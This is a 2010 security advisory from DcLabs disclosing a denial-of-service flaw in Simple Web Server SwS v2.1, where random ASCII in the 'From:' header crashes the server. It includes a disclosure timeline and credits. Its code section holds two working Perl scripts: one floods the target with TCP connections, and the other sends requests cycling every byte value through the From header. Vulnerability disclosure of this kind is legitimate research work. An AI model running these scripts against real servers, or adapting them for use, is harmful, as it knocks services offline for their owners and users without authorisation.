[DCA-0003] [Software] - Simple Web Server [Vendor Product Description] - The easy and small way to open an HTTP Web Server. OS Versions:Windows9x/Me/NT/2000/XP [Bug Description] - SwS can't handle the header 'From:' when using random ASCII characters leading to Denial-of-Service. [History] - Advisory sent to vendor on 06/14/2010. - No response from vendor - Public advisory & exploit 08/02/2010. [Impact] - Low [Affected Version] - Simple Web Server SwS v2.1 - Prior versions may also be vulnerable [Code] #!/usr/bin/perl use IO::Socket; $ip = $ARGV[0]; $port = $ARGV[1]; $conn = $ARGV[2]; $num = 0; while ( $num <= $conn ) { system("echo -n ."); $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n"; close($s); $num++; } #!/usr/bin/perl use Net::HTTP; if (@ARGV < 1) { usage(); } $host = @ARGV[0]; $port = @ARGV[1]; $num = 0; print "[+] Sending request...\n"; while ($num <= 255) { my $s = Net::HTTP->new(Host => $host, HTTPVersion => "1.0") || die $@; $s->write_request(GET => "/", 'User-Agent' => "Mozilla/5.0", 'From' => chr($num)); $num++; close($s); } print "\n[+] Done!\n"; sub usage() { print "[-] Usage: <". $0 ."> \n"; print "[-] Example: ". $0 ." 127.0.0.1 80\n"; exit; } [Credits] Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br [Greetz] Crash and all Dclabs members. -- Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br